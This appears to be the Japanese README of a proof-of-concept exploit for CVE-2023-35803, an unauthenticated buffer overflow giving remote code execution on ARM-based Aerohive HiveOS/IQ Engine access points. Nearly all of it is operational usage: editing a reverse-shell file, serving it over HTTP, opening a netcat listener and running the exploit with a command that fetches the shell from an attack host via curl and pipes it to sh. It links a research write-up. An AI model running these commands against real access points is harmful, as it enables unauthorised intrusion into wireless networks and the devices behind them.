
PoCエクスプロイト for CVE-2023-35803:Aerohive HiveOS/Extreme Networks IQ Engineにおける未認証のバッファオーバーフローを利用し、ARMベースのワイヤレスアクセスポイント上でリモートコード実行を可能にします。
HiveOS/IQ Engine <10.6r2 を実行するARMベースのアクセスポイント向けPoC。
revshell を編集して、シェルキャッチャーのIP/ポートを指定しますpython3 -m http.servernc -lvnp 1337python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"Writeup はこちら: https://research.aurainfosec.io/pentest/bee-yond-capacity/
